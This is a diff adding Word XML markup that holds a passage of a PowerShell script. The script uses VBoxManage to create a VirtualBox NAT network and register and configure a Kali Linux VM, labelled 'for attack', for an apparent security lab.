+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Write-Output "NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' does not exist."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add NAT network with desired settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Write-Output "Creating NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> add --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>netname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --network "192.168.0.0/24" --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on --ipv6 off --</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>enable</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Start NAT network</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Write-Output "Starting NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> start --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>netname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Start-Sleep 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># 2. Create Kali VM for attack | +- </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2min</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Register VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>createvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --name $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ostype</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'Debian_64' --register</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Set VM settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>modifyvm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cpus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>graphicscontroller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vmsvga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vram</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --nat-network1 $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bidirectional</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add a SATA storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --name 'SATA' --add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --controller </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>IntelAHCI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --bootable on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add existing VDI to SATA controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storageattach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storagectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hdd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'.\VDI\Kali</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Linux 2023.4 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Add </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxGuestAdditions</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>VBoxManage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>storageattach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
